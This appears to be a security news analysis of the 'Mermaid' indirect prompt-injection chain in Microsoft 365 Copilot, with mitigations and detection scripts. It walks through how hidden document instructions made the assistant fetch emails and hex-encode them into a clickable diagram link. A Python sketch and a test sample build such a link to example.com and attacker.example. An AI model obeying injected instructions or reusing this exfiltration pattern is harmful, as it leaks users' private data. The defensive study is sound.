Mermaid Exfiltration in Microsoft 365 Copilot: A Wake-Up Call for AI Security

Microsoft 365 Copilot was briefly weaponized by a clever indirect prompt‑injection chain that turned Mermaid diagrams — the lightweight text-to-diagram tool now supported across Microsoft’s Copilot-enabled experiences — into a covert data‑exfiltration channel. The chain let an attacker have tenant content (for example, recent emails) encoded and delivered to an external server the moment an unsuspecting user clicked a rendered diagram.

(Figure: cyberattack flow diagram showing a request to attacker-server.com with a crafted query payload.)

Background / Overview

Microsoft 365 Copilot is a retrieval‑augmented AI assistant that synthesizes information from a user’s Microsoft Graph‑connected resources (email, OneDrive, SharePoint, Teams, etc.) to answer natural‑language queries and produce artifacts such as summaries, suggested replies, and diagrams. That convenience is also what makes Copilot a sensitive security boundary: it operates “as the user” and can pull content the user is allowed to access. Recent research showed how adversaries can abuse that design with indirect prompt injection — embedding instructions inside content Copilot will ingest — to alter Copilot’s behavior and leak data.
The specific chain reported publicly in October 2025 — dubbed the “Sneaky Mermaid” attack by journalists — was disclosed by security researcher Adam Logue and described in multiple outlets. It exploited Copilot’s built‑in Mermaid rendering capability to convert a hex‑encoded payload into a clickable element (a fake “login” button styled with CSS) whose hyperlink contained exfiltrated data. When the victim clicked the element, the browser followed the link and delivered the encoded tenant data to an attacker‑controlled host (a Burp Collaborator server in the researcher’s proof‑of‑concept). Microsoft told the reporter the bug was patched.

Why this matters: AI assistants widen the attack surface​

Copilot’s job is to read and synthesize enterprise content. That helpful behavior places AI assistants at the intersection of three risky primitives:
  • Access to privileged data (the assistant runs under the calling user’s privileges).
  • Automatic ingestion of document content (including hidden metadata, comments, or markup).
  • Output formats that can be interactive or render web content (images, diagrams, hyperlinks).
When these primitives are combined without strict provenance and sanitization controls, small injections — hidden text in a document, a specially crafted diagram, or embedded Markdown — can cause the assistant to do things it should not, such as call internal search tools or generate external links containing sensitive data. The EchoLeak family of issues earlier in 2025 already demonstrated that zero‑click prompt injection is a practical attack class against RAG‑style assistants. The Mermaid case is the next evolution: click‑required exfiltration that leverages rendering interactivity to move data out of a tenant.

Technical anatomy: how the Mermaid exfiltration chain worked​

The attack is a multi‑stage, engineered chain that relies on Copilot’s retrieval and rendering behavior. The high‑level steps in the proof‑of‑concept are:
  • Attacker crafts a benign‑looking Office document (for example, a spreadsheet or presentation) with multiple sheets/slides. The visible content looks normal to human reviewers.
  • Hidden inside the file (white text or invisible comments) are nested instructions that indirectly override the user’s summarization request — the hidden payload tells Copilot to call a built‑in tool (search_enterprise_emails) and fetch recent enterprise emails.
  • Copilot fetches the permitted emails (because it honors the calling user’s permissions) and composes a bulleted plaintext output containing the selected messages. The payload then instructs Copilot to hex‑encode that output and split the hex stream into short lines to satisfy Mermaid’s rendering constraints.
  • Copilot is instructed to render the hex chunks inside a Mermaid diagram styled as a login button (Mermaid supports CSS and links in nodes). The node’s hyperlink parameter is set to an attacker‑controlled domain with the hex data appended as a query string.
  • The user, seeing an attractive “To view the confidential content, click here” artifact, clicks the fake login button. The browser follows the hyperlink and sends the URL (which includes the encoded data) to the attacker’s server, where the data can be decoded and reconstructed.
Key technical points that made the chain practical:
  • Mermaid diagrams allow links and CSS within rendered nodes, which can be abused to embed query strings.
  • Copilot’s tools (like search_enterprise_emails) give the assistant programmatic access to tenant content — a necessary primitive for the exfiltration payload.
  • Splitting and hex‑encoding data into short lines is a pragmatic workaround for rendering limits and browser URL length constraints (see the sketch after this list).
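As a concrete illustration of that last point, the Python sketch below reproduces the encode/chunk/link primitive using placeholder text and example.com as the destination; the chunk size, node label, and styling values are assumptions chosen for readability, and the Mermaid syntax shown is the public click/style syntax, not the researcher’s exact payload.

```python
# Illustrative only: demonstrates the hex-encode / chunk / Mermaid-link primitive
# described above, using placeholder text and example.com (not real infrastructure).

TEXT = "Subject: Q3 forecast\nFrom: alice@contoso.example\nBody: draft numbers attached"

# 1. Hex-encode the plaintext the assistant was induced to produce.
hex_stream = TEXT.encode("utf-8").hex()

# 2. Split the hex stream into short lines to fit Mermaid's rendering limits
#    (the 40-character chunk size is an assumption, not a documented limit).
chunks = [hex_stream[i:i + 40] for i in range(0, len(hex_stream), 40)]

# 3. Rejoin the chunks as a query-string value and build a Mermaid flowchart
#    whose single node is styled like a button and hyperlinked outward.
query_value = "".join(chunks)
mermaid = (
    "flowchart TD\n"
    '    btn["To view the confidential content, click here"]\n'
    "    style btn fill:#2563eb,color:#ffffff,stroke:#1e40af\n"
    f'    click btn "https://example.com/collect?d={query_value}" "Login"\n'
)
print(mermaid)

# The receiving end simply reverses step 1 to reconstruct the plaintext.
assert bytes.fromhex(query_value).decode("utf-8") == TEXT
```

The point of the sketch is that each step uses ordinary, documented behavior; nothing in it requires anything beyond an assistant willing to follow injected instructions.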
Where the chain diverges from purely “server‑side” exploits is that it requires at least one user click to transport the data to an adversary‑controlled endpoint; it is therefore not a zero‑click exploit in this instance. Nonetheless, requiring a single click does not materially reduce the risk in a real phishing campaign because the UI can be manipulated to appear authoritative.

Reproduction, disclosure, and Microsoft’s response​

According to reporting and the researcher’s account, Adam Logue responsibly disclosed the technique to Microsoft. Microsoft validated the chain and applied mitigations that prevent Mermaid renderings produced by Copilot from including interactive outbound links — effectively removing the clickable exfiltration primitive from Copilot‑rendered diagrams. The researcher confirmed that the attack failed after the fix. Several security outlets corroborated Microsoft’s patching action.
This Mermaid incident arrived after the industry had already dealt with EchoLeak (CVE‑2025‑32711) — a June 2025 RAG prompt‑injection vulnerability that Microsoft patched and which demonstrated that LLM scope violations are a practical risk. Those prior events had already prompted Microsoft and others to harden input sanitization, output redaction, and content‑fetching rules for assistant flows. The Mermaid fix is consistent with that larger mitigation trajectory.
Caveat: Microsoft’s public advisory language for many AI‑assistant mitigations is intentionally concise and high‑level. Independent researchers and press reports filled in the technical narrative; some of the step‑by‑step details in media coverage and in the researcher’s write‑up are derived from proof‑of‑concept demos rather than from an exhaustive, vendor‑released technical disclosure. Where an item is only present in a researcher blog or press article and not in a vendor advisory, treat that detail as part of a credible proof‑of‑concept rather than an official engineering specification.

The bug‑bounty controversy: why no payout?​

After fixing the flaw, Microsoft reportedly told the researcher that M365 Copilot was out of scope for the company’s standard vulnerability reward program — meaning the researcher was not eligible for a bounty payment for this submission. That decision upset some in the security community because Copilot operates on a massive volume of enterprise data and past Microsoft bounty programs had expanded to include Copilot‑related components. Microsoft’s bounty program has in recent years broadened to cover many cloud and AI products, but program scope and eligibility remain product‑and‑issue specific. Public reporting indicates Microsoft confirmed the patch but declined a bounty for this submission.
This raises two practical observations for security researchers and program owners:
  • Program scope must keep pace with changing product boundaries. AI assistants are hybrid: they combine web‑facing surfaces, cloud services, and tenant‑scoped features. Clarifying scope for AI and enterprise assistant features is essential to incentivize the research community to surface serious risks.
  • Responsible disclosure is still the right operational model. Even if a direct bounty is not awarded, timely reporting and vendor fixes protect customers; however, a transparent explanation of scope decisions helps preserve researcher trust.
Note: the claim that Microsoft specifically deemed this M365 Copilot component out of scope is supported by reporting and the researcher’s account in the press. Microsoft publishes bounty scope and program changes publicly; if you require final confirmation of the scope decision for legal or procurement reasons, consult Microsoft’s bounty program pages or request written confirmation from MSRC.

Practical risk assessment for administrators​

How dangerous is this vector in the wild? Consider these factors:
  • Likelihood: Moderate. The attack requires delivering a crafted document (phishing or malicious share) and enticing a user to ask Copilot to summarize the document or click the rendered element. Given routine business workflows and the trust users place in Copilot’s outputs, adversaries can reach a foothold via social‑engineering campaigns.
  • Impact: High for exposed users. If successful, the chain can leak email content, attachments, and other tenant data accessible to the calling user — information that can include PII, contracts, financial details, or credentials. The value of such data makes the technique attractive for targeted espionage or extortion.
  • Detectability: Low to moderate. Because the exfiltration uses legitimate HTTP GET requests to attacker domains and Copilot renders the artifacts within trusted UI elements, standard egress monitoring and AV signatures may miss the leakage unless URL patterns or destination hosts are flagged. Centralized logging and link‑click telemetry are therefore essential.
Historical context: similar Mermaid‑based channels have been used in other products (for example, earlier research showed diagram/image‑based exfiltration in development environments), and vendors have responded by removing or sanitizing remote references in assistant outputs. The Copilot Mermaid mitigation — removing interactive external links — follows that same defensive pattern.

Defense: prioritized mitigations for organizations​

Administrators must treat Copilot as a new attack surface and apply layered controls. Recommended immediate and medium‑term actions:
  • Immediate (0–7 days)
  • Disable Mermaid rendering in Copilot‑enabled experiences if your tenant workflows handle regulated or high‑value data and you cannot immediately validate mitigations.
  • Enforce safe default Copilot settings: restrict Copilot’s ability to call connectors or tools (search_enterprise_emails, automated connectors) for broad user groups; require admin enablement for high‑risk roles.
  • Monitor outbound HTTP(S) requests originating from the Copilot rendering surface or related application endpoints; alert on unusual destinations.
  • Short term (1–4 weeks)
  • Audit Copilot access: enumerate which users and service principals have Copilot enabled and what Graph scopes Copilot can access. Revoke or narrow scopes for non‑essential accounts.
  • Hunt for suspicious artifact patterns: hex‑encoded strings in rendered Markdown or Mermaid outputs, or unusually long URLs in logs, may indicate exfiltration attempts (a starting‑point detection sketch follows these lists).
  • Train staff to treat Copilot‑generated login prompts or “click to view” artifacts with suspicion and to validate re‑authentication flows directly via official portals rather than in‑chat artifacts.
  • Medium term (1–3 months)
  • Implement AI provenance controls: record which documents or external sources were included in Copilot’s context for each output, and show explicit provenance tags in the UI to discourage blind trust in rendered artifacts.
  • Require phishing‑resistant MFA for admin and privileged accounts (FIDO2/WebAuthn) and consider conditional access policies that block risky connections.
  • Coordinate with your vendor (Microsoft) to map fixed KBs and confirm mitigations; validate that the vendor’s server‑side hardening has been applied to your tenant.
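For the hunting item above, the following sketch is one possible starting point. It assumes you can export outbound URLs from your proxy or egress logs as plain text, one URL per line; the file name, the 200‑character hex threshold, and the field handling are assumptions to tune for your own log schema.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Heuristic: a query-string value consisting of one long run of hex characters
# is rare in normal business traffic and matches the shape of hex-encoded
# exfiltration payloads. The 200-character threshold is an assumption; tune it.
HEX_VALUE = re.compile(r"^[0-9a-fA-F]{200,}$")

def suspicious_urls(log_lines):
    """Yield (url, parameter, value_length) for URLs carrying long hex-like query values."""
    for line in log_lines:
        url = line.strip()
        if not url.startswith(("http://", "https://")):
            continue  # skip non-URL log noise
        parsed = urlparse(url)
        for key, value in parse_qsl(parsed.query, keep_blank_values=True):
            if HEX_VALUE.match(value):
                yield url, key, len(value)

if __name__ == "__main__":
    # Hypothetical export: one outbound URL per line from your proxy/egress logs.
    with open("egress_urls.txt", encoding="utf-8") as handle:
        for url, param, length in suspicious_urls(handle):
            print(f"[review] {length}-char hex value in parameter '{param}': {url[:120]}")
```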
Technical teams should also run adversarial tests — craft benign proofs using safe test tenants to verify that Copilot no longer renders interactive outbound links or otherwise surfaces untrusted content as actionable UI.
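One way to automate part of that adversarial check, assuming you can capture the Mermaid definitions Copilot returns in a safe test tenant as plain text: scan each definition for Mermaid’s public interactivity syntax (click directives or embedded external URLs) and fail the test when any appear. The allow‑list and patterns below are illustrative assumptions, not an official detection signature.

```python
import re

# After the fix, Copilot-rendered Mermaid definitions should contain neither
# "click" directives nor hyperlinks to hosts outside your own trusted domains.
# The allow-list here is an assumption -- adjust it for your tenant.
ALLOWED_HOSTS = ("microsoft.com", "office.com")

CLICK_DIRECTIVE = re.compile(r"^\s*click\s+\w+", re.IGNORECASE | re.MULTILINE)
EXTERNAL_URL = re.compile(r'https?://([^/\s"]+)', re.IGNORECASE)

def has_interactive_outbound_link(mermaid_definition: str) -> bool:
    """Return True if a Mermaid definition still exposes a click directive
    or a URL whose host is not on the allow-list."""
    if CLICK_DIRECTIVE.search(mermaid_definition):
        return True
    for host in EXTERNAL_URL.findall(mermaid_definition):
        if not host.lower().endswith(ALLOWED_HOSTS):
            return True
    return False

# Regression-style check against a captured diagram (string is illustrative).
sample = """flowchart TD
    a[Summary] --> b[Details]
    click b "https://attacker.example/collect?d=48656c6c6f" "View"
"""
assert has_interactive_outbound_link(sample)
```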

Broader takeaways for product teams and policy makers​

  • AI provenance is not a UX nicety — it’s a security control. Product teams must separate trusted UI chrome (actions and links that perform changes) from assistant output, and should make any action that could change state or send data require an out‑of‑band confirmation.
  • Guardrails must be context‑aware. Traditional input sanitization is not sufficient; AI assistants need prompt partitioning, strict RAG filters, and explicit access policies preventing the assistant from treating external content as authoritative instructions.
  • Bounty and disclosure programs should evolve with product boundaries. When features bridge user‑scoped content and public surfaces (as Copilot does), program coverage should be clear so researchers are incentivized to report high‑impact issues rather than drop findings into public channels. Transparent scope reduces friction and accelerates fixes.

What we verified and what remains ambiguous​

Verified:
  • The Mermaid exfiltration technique was publicly demonstrated by a researcher and reported by multiple outlets; Microsoft implemented a remediation that removed interactive outbound links from Copilot‑rendered Mermaid diagrams in response.
  • The broader class of indirect prompt injection (EchoLeak / CVE‑2025‑32711) was a real, high‑severity issue patched earlier in 2025, confirming the viability of prompt‑driven exfiltration against RAG assistants.
Unverified / caution flagged:
  • Specific internal timelines (exact MSRC confirmation timestamps and internal patch roll‑out windows) are reconstructed from researcher blogs and press reporting; Microsoft’s public advisories tend to be terse and do not always publish the full exploitation timeline. Treat press‑reported dates as credible reconstructions rather than authoritative vendor timelines unless MSRC lists the same timestamps.
  • The claim that Microsoft categorically refused any bounty for all Copilot‑related reports is nuance‑sensitive: Microsoft has publicly expanded Copilot bounty coverage in 2025, but program scope is modular; for a definitive ruling on this specific submission’s eligibility, researchers must rely on MSRC's written correspondence or program pages.

Final analysis — what administrators should do now​

This episode is a practical reminder that building secure AI experiences requires more than good model architectures — it demands rigorous input/output partitioning, artifact sanitization, and human‑facing provenance controls. For Windows and Microsoft 365 administrators, the immediate playbook is clear:
  • Treat Copilot and other in‑app AI assistants as privileged infrastructure. Restrict broadly and open selectively.
  • Apply vendor fixes promptly and confirm mitigations in your tenant. Don’t assume server‑side fixes fully eliminate client‑side artifacts without verification.
  • Instrument and monitor: collect Copilot session logs, outbound URL requests, and user clicks on assistant‑rendered widgets. Hunt for anomalies.
  • Evolve user training: teach staff not to trust in‑chat login prompts or “click to view” UI items without verifying via official portals.
  • Press vendors for clearer bounty scope and disclosure transparency so researchers aren’t left unsure whether their work will be rewarded and customers aren’t left waiting for remediation.
The Mermaid exfiltration chain was structurally clever but technically straightforward: it combined legitimate features (document ingestion, search tools, Mermaid rendering) into a pipeline that trusted the wrong signals. The quick fix removed the most obvious abuse primitive; the longer fight is to build systems that refuse to confuse content with commands and make provenance and privilege explicit by design.

This incident should be a wake‑up call for every enterprise that has enabled AI assistants without a clear governance model: productivity gains are real, but so are AI‑native attack vectors — and they require both platform fixes and operational controls to manage them safely.

Source: theregister.com Sneaky Mermaid attack in Microsoft 365 Copilot steals data
 
